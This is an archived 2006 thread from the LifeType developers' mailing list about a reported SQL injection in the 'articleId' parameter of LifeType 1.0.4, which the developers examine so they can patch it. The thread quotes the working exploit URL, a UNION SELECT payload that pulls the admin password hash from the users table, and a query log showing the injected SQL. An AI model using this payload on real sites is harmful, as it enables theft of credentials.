[pLog-svn] Fwd: LifeType <= 1.0.4 'articleId' SQL injection

Jon Daley plogworld at jon.limedaley.com
Sat Jun 3 22:41:41 GMT 2006 

Ah, I turned on logging (turns out the slow logging isn't too bad for my 
site, so I don't mind turning it on now)

  152800 Query       SELECT a.id, a.date,

a.user_id,a.blog_id,a.status,a.properties,
                                                          a.num_reads, 
a.slug FROM articles a WHERE a.id = 9999/**/UNION/**/SEL
ECT/**/password,1,1,1,1,1,1,1/**/FROM/**/users/**/WHERE/**/id=1/* AND 
a.blog_id = 1 AND a.status = 1


I will probably fix this shortly.


On Sat, 3 Jun 2006, Jon Daley wrote:

> 	It doesn't work on my 1.0.4 install either, only partially.  It does 
> get the (presumably, I didn't check) admin password (hashed) into the 
> sql_error.log, which isn't a security risk in itself, but obviously, being 
> able to change the SQL queries is bad.  I don't see what the /**/ stuff is 
> doing.  Surely the articleId is validated to be an integer, so where is all 
> that sql getting assigned to?
>
> On Sun, 4 Jun 2006, Oscar Renalias wrote:
>
>> I couldn't get the linked script to work, but this is the interesting part 
>> of it:
>> 
>> http://www.yourhost.com/lifetype-1.0.4/index.php?op=ViewArticle&blogId=1&articleId=9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1/**/FROM/**/lt_users/**/WHERE/**/id=1/*
>> 
>> Clever.
>> 
>> On 4 Jun 2006, at 00:43, Oscar Renalias wrote:
>> 
>>> Whoops. Our first serious SQL injection issue!
>>> 
>>> Begin forwarded message:
>>> 
>>>> From: "rgod" <zerokool_556 at hotmail.com>
>>>> Date: 4 June 2006 00:30:31 GMT+03:00
>>>> To: <contact at lifetype.net>
>>>> Subject: LifeType <= 1.0.4 'articleId' SQL injection
>>>> 
>>>> http://retrogod.altervista.org/lifetype_104_sql.html
>>>> 
>>>> rgod
>>>> 
>>> 
>>> _______________________________________________
>>> pLog-svn mailing list
>>> pLog-svn at devel.lifetype.net
>>> http://devel.lifetype.net/mailman/listinfo/plog-svn
>>> 
>> 
>> _______________________________________________
>> pLog-svn mailing list
>> pLog-svn at devel.lifetype.net
>> http://devel.lifetype.net/mailman/listinfo/plog-svn
>
> **************************************
> Jon Daley
> http://jon.limedaley.com/
>
> With memory prices this low, who needs to deallocate memory?
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://devel.lifetype.net/mailman/listinfo/plog-svn
>

**************************************
Jon Daley
http://jon.limedaley.com/

Music has the uncanny ability to burrow
its way into our spiritual bones.
-- John Witvliet

More information about the pLog-svn mailing list